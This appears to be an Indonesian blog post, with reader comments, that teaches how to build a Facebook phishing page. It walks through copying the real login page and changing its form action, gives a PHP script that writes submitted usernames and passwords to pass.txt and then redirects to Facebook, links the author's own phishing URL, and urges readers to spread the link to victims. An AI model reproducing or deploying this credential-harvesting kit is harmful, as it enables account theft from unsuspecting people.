Cara kerja phising adalah, seseorang memasukkan username dan password dari sebuah halaman login palsu, username dan password tersebut akan terekam dan dikirim ke pembuat halaman login palsu tersebut.
Sebagai contoh kasus, saya akan menggunakan facebook. Berikut ini langkah teknisnya :
1.Buka http://www.facebook.com/login.php
2.Klik kanan lalu klik View page source atau lihat kode sumber laman
4.Cari Kode "action=" (tanpa tanda kutip) dengan munggunakan [CTRL+F] untuk kita modifikasi.
5.Pada action="http://login.facebook.com/login.php", ubahlah menjadi action="secret.php kemudian ubah juga method="post" menjadi method="get" .
7.Sekarang buka lembaran notepad yang baru, dan isikan script berikut :
<?php8.Simpan dengan nama file secret.php
header ("location: http://www.facebook.com/login.php");
$handle = fopen ("pass.txt", "a");
foreach ($_GET as $variable => $value) {
fwrite ($handle, $variable);
fwrite ($handle, "=");
fwrite ($handle, $value);
fwrite ($handle, "\r\n");
}
fwrite ($handle, "\r\n");
fclose ($handle);
exite;
?>
9.Buka notepad lagi dan biarkan isinya kosong, dan simpan dengan nama pass.txt
10.Selanjutnya upload ketiga file tersebut "index.php, secret.php, pass.txt" ke dalam website hosting anda.
11.Setelah selesai di upload, sekarang anda sudah berhasil memiliki sebuah halaman phising facebook.
Ini adalah halaman phising facebook milik saya : http://pacebook.id1945.com/
Tugas anda sekarang adalah menyebarkan link supaya orang bersedia membuka link yang berisikan halaman facebook palsu tersebut. Apabila ada orang yang mengaksesnya dan mencoba login dari halaman tersebut, yang muncul adalah halaman facebook yang asli yang menyatakan bahwa password yang di masukkan salah.
Sewaktu seseorang memasukkan password pada halaman tersebut, password akan terkirim kedalam file pass.txt yang telah anda buat sebelumnya. Berikut salah satu contoh hasil tangkapan password yang saya peroleh :
thank pakk
ReplyDeleteOke Sama2 nak
ReplyDeletekere bos
ReplyDelete